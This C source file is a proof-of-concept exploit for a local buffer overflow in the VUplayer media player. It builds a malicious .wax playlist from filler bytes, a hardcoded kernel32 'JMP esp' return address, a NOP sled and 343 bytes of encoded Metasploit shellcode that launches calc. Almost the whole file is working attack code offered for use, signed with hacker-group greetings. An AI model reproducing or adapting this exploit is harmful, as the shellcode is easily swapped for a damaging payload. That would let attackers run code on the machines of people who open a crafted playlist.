/* VUplayer (.wax file) local buffer overflow crash exploit * By Assad edin - Moroccan Hackerz ( Mgharba Until Death ) - Storms0uth@xxxxxxxxxxx * Mgharba Bhjawa Msalmine : xCracker - Assad edin - Simo-s0ft . * Special Thanks: All Moroccan & Muslims Hackers & Str0ke Ro7 T9Awd CHof li I7wik. */ #include<stdio.h> #include<string.h> #include<windows.h> // unicode format char header1[]= "\x3c\x77\x61\x78\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x22" "\x33\x2e\x30\x22\x20\x3e\x0d\x0d\x0d\x3c\x65\x6e\x74\x72\x79\x3e" "\x0d\x0d\x0d\x3c\x74\x69\x74\x6c\x65\x3e\x43\x6f\x64\x65\x64\x20" "\x42\x79\x20\x53\x69\x6d\x4f\x2d\x73\x30\x66\x54\x2e\x6d\x70\x33" "\x3c\x2f\x74\x69\x74\x6c\x65\x3e\x0d\x0d\x0d\x3c\x72\x65\x66\x20" "\x68\x72\x65\x66\x20\x3d\x09"; //win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com unsigned char scode[] = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47" "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38" "\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48" "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58" "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44" "\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38" "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33" "\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47" "\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a" "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b" "\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53" "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57" "\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39" "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46" "\x4e\x46\x43\x36\x42\x50\x5a"; char header2[]= "\x2f\x3e\x0d\x3c\x2f\x65\x6e\x74\x72\x79\x3e\x0d\x3c\x2f\x77\x61" "\x78\x3e"; int main(int argc,char *argv[]) { FILE *openfile; char exploit[1290]; char junk[925]; char ret[]="\x68\xD5\x85\x7C";// JMP kernel32.dll esp (Windows Trust SP2) char nop[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; printf(" CoDEd By Ismail ==> marrakesh city"); memset(junk,0x41,925); memcpy(exploit,junk,925); memcpy(exploit+925,ret,strlen(ret)); memcpy(exploit+925+strlen(ret),nop,strlen(nop)); memcpy(exploit+925+strlen(ret)+strlen(nop),scode,343); openfile=fopen("ismail.wax","wb"); if(openfile==NULL){ perror("ERROR....\n");} fputs(header1,openfile); fputs(exploit,openfile); fputs(header2,openfile); fclose(openfile); printf("File created .....!" "open it whit VUplayer..!"); return 0; }